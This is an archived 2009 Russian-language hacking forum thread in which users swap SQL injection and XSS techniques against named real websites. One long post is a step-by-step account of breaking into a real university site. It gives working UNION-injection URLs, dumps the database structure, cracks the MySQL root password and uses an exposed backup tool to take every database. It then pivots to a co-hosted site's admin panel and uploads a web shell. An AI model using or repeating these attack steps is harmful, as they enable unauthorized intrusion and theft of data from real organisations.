ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #9611  
Старый 25.10.2009, 22:10
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

а как тут узнать количество столбцов
http://www.multirussia.ru/index.php?id=34'
 

  #9612  
Старый 25.10.2009, 22:31
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от TELO  
а как тут узнать количество столбцов
http://www.multirussia.ru/index.php?id=34'
и снова 3 ий мускул ,без поддержки обьединения запросов посредством UNION ,+ при запросах типа SELECT,ни подзапросов
 

  #9613  
Старый 25.10.2009, 23:05
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от eliteload  
возможно ли провести инъекцию в этом случае:
"SELECT page_id,page_title FROM page WHERE page_id='{INJ}' ";
"SELECT column1,column2,column3,column4,column5,column6,co lumn7 FROM table_xz WHERE page_id='{INJ}' ORDER BY date desc, id desc ";
А почему же нет?
 

  #9614  
Старый 25.10.2009, 23:11
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

введ в поле "><script>alert(1)</script>

а в ответ

Цитата:
Сведения об исключении: System.Web.HttpRequestValidationException: Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><s cript>alert(1)</sc...").

Ошибка источника:

[Отсутствуют соответствующие исходные строки]


Исходный файл: c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temp orary ASP.NET Files\root\a09a8f10\84ab695f\App_Web_newstudent.as px.cdcab7d2.t8jq514u.0.cs Строка: 0

Трассировка стека:

[HttpRequestValidationException (0x80004005): Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><s cript>alert(1)</sc...").]
System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +8721914
System.Web.HttpRequest.ValidateNameValueCollection (NameValueCollection nvc, String collectionName) +111
System.Web.HttpRequest.get_Form() +129
System.Web.HttpRequest.get_HasForm() +8722023
System.Web.UI.Page.GetCollectionBasedOnMethod(Bool ean dontReturnNull) +97
System.Web.UI.Page.DeterminePostBackMode() +63
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +6785
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +242
System.Web.UI.Page.ProcessRequest() +80
System.Web.UI.Page.ProcessRequestWithNoAssert(Http Context context) +21
System.Web.UI.Page.ProcessRequest(HttpContext context) +49
ASP.newstudent_aspx.ProcessRequest(HttpContext context) in c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temp orary ASP.NET Files\root\a09a8f10\84ab695f\App_Web_newstudent.as px.cdcab7d2.t8jq514u.0.cs:0
System.Web.CallHandlerExecutionStep.System.Web.Htt pApplication.IExecutionStep.Execute() +181
System.Web.HttpApplication.ExecuteStep(IExecutionS tep step, Boolean& completedSynchronously) +75


Информация о версии: Платформа Microsoft .NET Framework, версия:2.0.50727.3603; ASP.NET, версия:2.0.50727.3082
че за?????
 

  #9615  
Старый 25.10.2009, 23:13
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Krist_ALL  
введ в поле "><script>alert(1)</script>

а в ответ


че за?????
Троль?
Цитата:
Сведения об исключении: System.Web.HttpRequestValidationException: Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><s cript>alert(1)</sc...").
Я в ужасе.
 

  #9616  
Старый 25.10.2009, 23:19
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

я не пойму нафиг что ругается на ошибку. причем тут фрамеворк
 

  #9617  
Старый 25.10.2009, 23:32
_gr34t
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696

Репутация: 40
По умолчанию

Krist_ALL, это похоже на ColdFusion
 

  #9618  
Старый 25.10.2009, 23:53
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

univd.edu.ua
Этот пост посвящается человеку под ником Strilo4ka.
Меня просто удивила такая рьяная настойчивость в поиске, и такая безнадежная по его мнению ситуация, в более чем простом деле.

Цитата:
Сообщение от Strilo4ka  
а дальше вроде ниче сделать нельзя шел вроде залить нельзя или я че то не доганяю на _http://www.univd.edu.ua/
Есть SQL инъект, и первым делом смотрим версию БД MySQL, за это отвечает функция version().
Т.к. выводимые поля у нас 1, 2 и 3 значит выполняем запрос:
Код:
http://www.univd.edu.ua/document/index.php?id_doc=414+and+1=4+union+select+version(),2,3,4,5+--+
На выводе мы получаем строку 5.0.67-log, а это значит, что в отличии от версий >= 4.x есть преимущество такое как БД information_schema и таблицы в ней tables и columns, по средствам которых можно получить полное представление о структуре БД. Самое, на мой взгляд, оптимальное решение, вывести структуры БД в виде таблица:колонка, это можно сделать обратившись к таблице columns и её колонкам table_name и column_name.
Запрос будет выглядеть следующем образом:
Код:
http://www.univd.edu.ua/document/index.php?id_doc=414+and+1=4+union+select+concat_ws(0x3a,table_name,column_name),2,3,4,5+from+information_schema.columns+--+
Но так как скрипт выводит всего лишь одну строку из БД, то мы получаем имя таблицы CHARACTER_SETS и имя колонки CHARACTER_SET_NAME. Для того, что бы нам посмотреть все имена существующих таблиц и колонок, нам необходимо воспользоваться оператор LIMIT. Синтаксис оператора выгладит следующим образом: LIMIT 10, 1; Данное выражение вернет одну строку, начиная с десятой. А значит используя этот оператор наш запрос будет выглядеть следующим образом:
Код:
http://www.univd.edu.ua/document/index.php?id_doc=414+and+1=4+union+select+concat_ws(0x3a,table_name,column_name),2,3,4,5+from+information_schema.columns+limit+200,1+--+
Т.е. мы вывели 200-ую строку таблицы columns, результат которой: wp_comments:comment_content
Проще говоря, нужно просто перебрать все записи таблицы columns с первой по последнюю, если не охота возится руками, есть специализированный софт, который делает это всё в автоматическом режиме.

Так же можно проверить права пользователя обратившись к БД mysql и таблице user. Чаще, доступ к этой таблице естественно закрыт, из-за безопасности пользователей. Но в нашем случае, это не так И мы смело можем посмотреть имя и пароль (в зашифрованном виде) пользователей БД MySQL. Пароль шифруется обычно алгоритмом либо mysql, либо mysql5. В нашем случае, пароль зашифрован именно алгоритмом mysql. Имя логин root (главного пользователя) и пароль (хеш которого мы подобрали на онлайн сервисе hashcracking.info), мы можешь уже что-нибудь сделать.
Попробуем найти непосредственно доступ к БД, через PhpMyAdmin, т.к. чаще всего (чаще всегда ) используется именно она. Попробуем просканировать сайт, на открытые директории через онлайн сервис security-digger.org.
Досадно но PhpMyAdmin сервис нам так и не показал.
В отчаянии, я посмотрел robots.txt, и к удивлению увидел Disallow: /dumper/, в которой дивным образом располагается Sypex Dumper Lite 1.0.8. Эта утилита для легкого и удобного бэкапа БД. Недолго думая вводим уже известный нам пароль пользователя root. Теперь мы имеем возможность сделать и скачать бэкап любой БД на этом сервере. Смотрим, что у нас есть:
Код:
information_schema
banner
deal
dlinux
dpforum
ecom
forum
foto
helur_danneo
human
hybrid
l2jdb
linux
linuxkhua
mysql
shop
site
swinger
test
tz
univd
wolf
Не найдя ничего интересного в базе univd и тем более не зная названия директории администраторской панели, я, немного подумав начинаю просматривать содержимое других БД.
И почему-то приглянулась мне почему-то база linuxkhua, а именно приглянулась своим оканчанием ua, т.е. понятно, что это национальный украинский домен Не долго подумав, вбиваю в гугле linuxkhua, и как результат получаю это:
Код:
Свободное ПО для свободных людей @ linux.kh.ua - Каталог сайтов ...
Опечатки: Ѻ Зз Ð , linuxkhua. SEO: Яндекс ТИЦ: 9100, Google PR: 0. Анализ сайта: Alexa traffic Старницы сайта linux.kh.ua в индексе Google.com ...
www.spravka.co.ua/10721-linux.kh.ua - Похожие
Ну и ясно стало, что сайт linux.kh.ua и база linuxkhua - это единое целое
Дальше, первым делом, смотрим robots.txt и узнаем название директории администраторской панели: linux.kh.ua/apanel/ Достаем из бэкапа что мы слили средствами Sypex Dumper, логин и пароль пользователя, заходим и видим вкладочку "Файл браузер" и жмем кнопочку "Залить шелл".
Заходим на шелл и попадаем на сервер, на котором хостится univd.edu.ua. Так как цель у нас была непосредственно только этот сайт, то прав на него нам хватает
/home/snake/univd/univd/ drwxrwxrwx

Если же нужны какие-то другие манипуляции, то и здесь все хорошо, т.к. ядро бажное:
Код:
uname -a: Linux web 2.6.15.6 #3 PREEMPT Thu May 25 16:08:10 EEST 2006 i686
Но к сожалению SSH порт закрыт

Но намеченная цель, достигнута. Уважаемый пользователь Strilo4ka, все действия указанные выше, не требуют никаких специфических знание, включаем логику и всё становится предельно ясным Успехов!

В этом посте я не указывал имена таблиц в которых лежат конфиденциальные данные, такие как логины и пароли, так же скрыл сами пароли. Но получить эти данные не составляют никаких проблем. Ссылки на шелл и сбрученные пароли, не высылаю. Все предельно просто.
 

  #9619  
Старый 26.10.2009, 00:47
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Код:
возможно ли провести инъекцию в этом случае:
"SELECT page_id,page_title FROM page WHERE page_id='{INJ}' ";
"SELECT column1,column2,column3,column4,column5,column6,co lumn7 FROM table_xz WHERE page_id='{INJ}' ORDER BY date desc, id desc ";
Цитата:
Сообщение от Ctacok  
А почему же нет?
Цитата:
Сообщение от eliteload  
тогда такой вопрос.. какой запрос надо сделать, чтобы удачно провести инъекцию?
update :
сперва глянул на локалхосте :
1) ?page_id=1+and+1=1
2) ?page_id=1+and+1=2 (ответ тот же что и в первом)
вот по этому так и решил.

Последний раз редактировалось L I G A; 26.10.2009 в 12:22..
 

  #9620  
Старый 26.10.2009, 00:48
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

Цитата:
Сообщение от L I G A  
хрен шо там проведешь
Почему же? Можно провести, если конечно нет фильтрации. Если не будет вывода, то можно создать условие, при котором подбирать символы посимвольно, и если символ соответствует нужному, то возвращать верное значение page_id, если не верное, то возвращать заведомо неверное значение.
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ